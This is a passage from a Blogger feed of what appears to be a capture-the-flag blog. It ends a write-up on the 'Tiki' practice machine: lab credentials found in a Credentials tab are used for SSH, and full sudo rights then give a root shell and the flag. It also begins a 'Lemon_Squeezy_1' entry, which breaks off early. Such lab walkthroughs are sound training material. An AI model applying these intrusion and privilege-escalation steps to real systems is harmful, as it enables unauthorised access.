medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhAuDbvNnGdM_f5iP8MiqjvBVZFdzPpIQZqbElScDZboojdI6LhJ5EkYvoy5YRRGpAenABdrbskbh9UsEg6MFF2idh_4sP-7vI3tDwB73LBvaTFKnIsRRAmfZI7NhMxhbEWqpjNjc7JF-Y8WL2J2pAyZXhIDUXHKmOSCqgrFUrxF4o1DNw1y02sMDmD0w&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;396&quot; data-original-width=&quot;887&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhAuDbvNnGdM_f5iP8MiqjvBVZFdzPpIQZqbElScDZboojdI6LhJ5EkYvoy5YRRGpAenABdrbskbh9UsEg6MFF2idh_4sP-7vI3tDwB73LBvaTFKnIsRRAmfZI7NhMxhbEWqpjNjc7JF-Y8WL2J2pAyZXhIDUXHKmOSCqgrFUrxF4o1DNw1y02sMDmD0w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to the tab &lt;b&gt;Search&lt;/b&gt; and finding tab &lt;b&gt;Credentials&lt;/b&gt; we discover&amp;nbsp;&lt;b&gt;silky:Agy8Y7SPJNXQzqA&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj871iZksS0DFGohagxM2kP2GlggyvhXC6HK-_B1e0bbO7M5BYL8jLt2ayehUQZEyFqnREXUZx3uyAXvwlpewBlaxgu7MyYI_7yuJ7M9wcX324UPzbKOv7btBvytHFEv35eH9Gyktt9F4QTJ0QwBwUaoEN6hZaAEDNvGdnpzMGpkPwVlqER3M6qcGzhxg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;782&quot; data-original-width=&quot;842&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj871iZksS0DFGohagxM2kP2GlggyvhXC6HK-_B1e0bbO7M5BYL8jLt2ayehUQZEyFqnREXUZx3uyAXvwlpewBlaxgu7MyYI_7yuJ7M9wcX324UPzbKOv7btBvytHFEv35eH9Gyktt9F4QTJ0QwBwUaoEN6hZaAEDNvGdnpzMGpkPwVlqER3M6qcGzhxg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- SSH-ing with credentials &lt;b&gt;silky:Agy8Y7SPJNXQzqA&lt;/b&gt; we have a shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiYbjrpNnBvaAF7S8fXae5jmZJouVLptLakPMMIPljUtmuKt58HvQd2yFXB77okRxZeFa5kYVjYX8bVfI5bcnAknT9n-wOR77YGeCMKzT-QBknHphO2lR6ETd2oRwX9IdmugQ9W1SDmFg44cFhWE9sEHt506GombVFyVGh99zxmY_WwNyU_9cpjkwVnZw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;517&quot; data-original-width=&quot;934&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiYbjrpNnBvaAF7S8fXae5jmZJouVLptLakPMMIPljUtmuKt58HvQd2yFXB77okRxZeFa5kYVjYX8bVfI5bcnAknT9n-wOR77YGeCMKzT-QBknHphO2lR6ETd2oRwX9IdmugQ9W1SDmFg44cFhWE9sEHt506GombVFyVGh99zxmY_WwNyU_9cpjkwVnZw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- It is interesting that user&lt;b&gt; silky&lt;/b&gt; is part of the group &lt;b&gt;sudo&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBHux0VoOQ5TwjMYHaX9OAK-f8bF_JS-cp_Bq7Uw-GQ50UAmxP1lHrGElB-W4Yavw87t1jHtX4B1aJt2QSCXN0Hn8iOepyIXuu_1l5lYztRkAkJyLJYrTLYm_fZHtn40luX69ezfjarpFS2xc6LhFHxmmtkF03UYJvnp3u2HJlFJWW9fxhYuP1UGfDhA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;851&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBHux0VoOQ5TwjMYHaX9OAK-f8bF_JS-cp_Bq7Uw-GQ50UAmxP1lHrGElB-W4Yavw87t1jHtX4B1aJt2QSCXN0Hn8iOepyIXuu_1l5lYztRkAkJyLJYrTLYm_fZHtn40luX69ezfjarpFS2xc6LhFHxmmtkF03UYJvnp3u2HJlFJWW9fxhYuP1UGfDhA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Also there is the file &lt;b&gt;.sudo_as_admin_successful&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiysywtb8DjAid48oAg7b9ZaBDyFP159WGTdOX-7GXH0Hc_-TbNW4MAE7n4sirOI01ZkXubmUbLb8eY6aG8L0CzNQ9dVUwsm7UVeY0HI5ql2EX0rTLbCYOtb4QSTSWtj25wuq19WNEmkxUtNzVWtPev8n1t6zfcs7NwsRLIvP346g1uNcXILnVI9WczJw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;605&quot; data-original-width=&quot;814&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiysywtb8DjAid48oAg7b9ZaBDyFP159WGTdOX-7GXH0Hc_-TbNW4MAE7n4sirOI01ZkXubmUbLb8eY6aG8L0CzNQ9dVUwsm7UVeY0HI5ql2EX0rTLbCYOtb4QSTSWtj25wuq19WNEmkxUtNzVWtPev8n1t6zfcs7NwsRLIvP346g1uNcXILnVI9WczJw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- We are lucky that user &lt;b&gt;silky&lt;/b&gt; has full sudoer privileges:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgbtMIXbLSPabRqLA64f6EA8-8oCoFyTJqInJGKeqgXPlpz4TuFZ_eCtf1hg9xgp5hS10ibyIqO3T6z1OIdl2F1AJMKBUR1IMJU3n0oEVhhqWwW5k7CjeJX6YmqesXvxofO8qBPa-KREB-p2o7hYPd2LRXKD2PITGahJluOuEPvQPAqC2Io8hO-6BdQAg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;209&quot; data-original-width=&quot;746&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgbtMIXbLSPabRqLA64f6EA8-8oCoFyTJqInJGKeqgXPlpz4TuFZ_eCtf1hg9xgp5hS10ibyIqO3T6z1OIdl2F1AJMKBUR1IMJU3n0oEVhhqWwW5k7CjeJX6YmqesXvxofO8qBPa-KREB-p2o7hYPd2LRXKD2PITGahJluOuEPvQPAqC2Io8hO-6BdQAg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally we get a root shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgCffv_56yyxkakrXOipbbPT95UWOugr6OpCmO2VyCnfc1TJy2h6XK1kZ-ZQTNjabTDXjKGa1EPsewQYJMtGYd0KVB2rJUj-hFOZsYvN0apFAgiBP8J6shFTqZXp-lydBlD3RJVGIQcTFWN9aZ-oZY-7nw9hkBKHbmTMFezq5qBSjKcfCS4xf-OLbOJ1Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;71&quot; data-original-width=&quot;451&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgCffv_56yyxkakrXOipbbPT95UWOugr6OpCmO2VyCnfc1TJy2h6XK1kZ-ZQTNjabTDXjKGa1EPsewQYJMtGYd0KVB2rJUj-hFOZsYvN0apFAgiBP8J6shFTqZXp-lydBlD3RJVGIQcTFWN9aZ-oZY-7nw9hkBKHbmTMFezq5qBSjKcfCS4xf-OLbOJ1Q=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - CAPTURING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading&amp;nbsp;&lt;b&gt;flag.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirtEqoasmSkoxcGp2DcF44beOI9ejmc154v5w7AeP-DlhYQM-fHTcYs194e_jbwh32E2o2letRXjKg7iJ_35_CH_RUpCFgxMZlJSvSAJrf3W6NgUh4E7ob-UDVj80n2R7CXlkMLXyunc9rAuvt-jfJkHdJXj96rxFnoh7GjTwTfBObBJDydLo2uQ-J3A&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;353&quot; data-original-width=&quot;1421&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirtEqoasmSkoxcGp2DcF44beOI9ejmc154v5w7AeP-DlhYQM-fHTcYs194e_jbwh32E2o2letRXjKg7iJ_35_CH_RUpCFgxMZlJSvSAJrf3W6NgUh4E7ob-UDVj80n2R7CXlkMLXyunc9rAuvt-jfJkHdJXj96rxFnoh7GjTwTfBObBJDydLo2uQ-J3A=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/6309731334704853861'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/6309731334704853861'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/tiki.html' title='Tiki'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEgAO-6_eJNTYPCK3HeXdvSMptkj7-4sVUSHsZqCfONrDDFQnkEIoclvotgfeV7Nl0zXLO4V9uhcXYDhr9IWYHQhgnoM1HSKYRSIjCSZxDNMnxnWT8BNFWmvXPy89zSQJc6V3HbrABspug-nX7S4qXyoPT0p6o98FOzCudqo13ZNl1oY4MHvwJRxp3c_xQ=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-4020452017125218289</id><published>2022-02-14T10:45:00.001-06:00</published><updated>2022-02-19T13:39:21.492-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Lemon_Squeezy_1</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;LEMON SQUEEZY 1&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh7Cu8fQ_OuHmwf2QuZAeZbC5aOJQznTlLQBFTCX6BOBJLRZ53-BRXVbp0sPQlvGV-86kSXQ0l2DTH7E-NRGUD0mtvbPv3Hd_y-I-fT5dmGd33vIzeTmJUvNKRFOB069z_OTdPYJP7yp2NJhnFH18ifk5Fyr4jgwaCvyyc_q66J3rABAWANUm3LteckLg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;254&quot; data-original-width=&quot;624&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh7Cu8fQ_OuHmwf2QuZAeZbC5aOJQznTlLQBFTCX6BOBJLRZ53-BRXVbp0sPQlvGV-86kSXQ0l2DTH7E-NRGUD0mtvbPv3Hd_y-I-fT5dmGd33vIzeTmJUvNKRFOB069z_OTdPYJP7yp2NJhnFH18ifk5Fyr4jgwaCvyyc_q66J3rABAWANUm3LteckLg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 